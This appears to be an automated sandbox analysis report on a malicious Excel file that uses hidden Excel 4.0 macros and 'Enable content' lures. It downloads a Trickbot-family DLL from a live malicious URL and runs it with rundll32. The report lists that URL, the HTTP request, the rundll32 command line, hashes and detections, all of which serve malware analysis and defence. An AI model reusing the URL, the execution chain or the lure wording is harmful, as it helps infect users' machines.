Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.19090.20815

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.19090.20815 (renamed file extension from 20815 to xls)
Analysis ID:382978
MD5:daf2b1b562a007a93fbe00dee3ec93d3
SHA1:eed18fda9a83a4d6bdc1d65ea29c6dc62dddaf5f
SHA256:ac5eb1618543365bfdbd27633949fc179424317db799d2ca55e39f0ef88fff44
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2452 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2560 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2400 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2320 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.19090.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://revolet-sa.com/files/countryyelow.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://revolet-sa.com/files/countryyelow.phpVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbxVirustotal: Detection: 21%Perma Link
Source: C:\Users\user\sdbybsd.fdsVirustotal: Detection: 21%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Heur.19090.xlsVirustotal: Detection: 8%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: soPLV[1].fbx.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: revolet-sa.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13554C9E.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: revolet-sa.com
Source: rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2088176662.0000000002840000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2088176662.0000000002840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. :54 Protected View Thi
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 18 the decryption of the docum
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 14Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 14Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SecuriteInfo.com.Heur.19090.xlsInitial sample: EXEC
Source: SecuriteInfo.com.Heur.19090.xlsInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: SecuriteInfo.com.Heur.19090.xlsOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox ViewDropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: SecuriteInfo.com.Heur.19090.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLS@7/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC004.tmpJump to behavior
Source: SecuriteInfo.com.Heur.19090.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: SecuriteInfo.com.Heur.19090.xlsVirustotal: Detection: 8%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00241030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00241030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00960E20 push dword ptr [edx+14h]; ret 4_2_00960F2D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00241030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00241030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001B095E mov eax, dword ptr fs:[00000030h]4_2_001B095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001B0456 mov eax, dword ptr fs:[00000030h]4_2_001B0456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00241030 mov eax, dword ptr fs:[00000030h]4_2_00241030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00241030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00241030
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Heur.19090.xls8%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbx22%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbx2%ReversingLabsWin32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds22%VirustotalBrowse
C:\Users\user\sdbybsd.fds2%ReversingLabsWin32.Trojan.Trickpak

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.rundll32.exe.810000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
revolet-sa.com4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://revolet-sa.com/files/countryyelow.php9%VirustotalBrowse
http://revolet-sa.com/files/countryyelow.php100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
revolet-sa.com
192.232.249.186
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://revolet-sa.com/files/countryyelow.phptrue
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpfalse
          high
          http://www.%s.comPArundll32.exe, 00000004.00000002.2088176662.0000000002840000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2088176662.0000000002840000.00000002.00000001.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2088975408.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087656054.0000000000BA7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2088713957.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087501344.00000000009C0000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                192.232.249.186
                revolet-sa.comUnited States
                46606UNIFIEDLAYER-AS-1USfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:382978
                Start date:07.04.2021
                Start time:00:39:14
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 18s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:SecuriteInfo.com.Heur.19090.20815 (renamed file extension from 20815 to xls)
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winXLS@7/8@1/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 8.1% (good quality ratio 5.4%)
                • Quality average: 64.3%
                • Quality standard deviation: 45.9%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 9
                • Number of non-executed functions: 4
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                00:39:40API Interceptor9x Sleep call for process: rundll32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                192.232.249.186SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                revolet-sa.comSecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                UNIFIEDLAYER-AS-1USSALM0BRU.exeGet hashmaliciousBrowse
                • 162.241.148.243
                Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                catalogue-41.xlsbGet hashmaliciousBrowse
                • 108.167.180.111
                documents-1660683173.xlsmGet hashmaliciousBrowse
                • 192.185.56.250
                06iKnPFk8Y.dllGet hashmaliciousBrowse
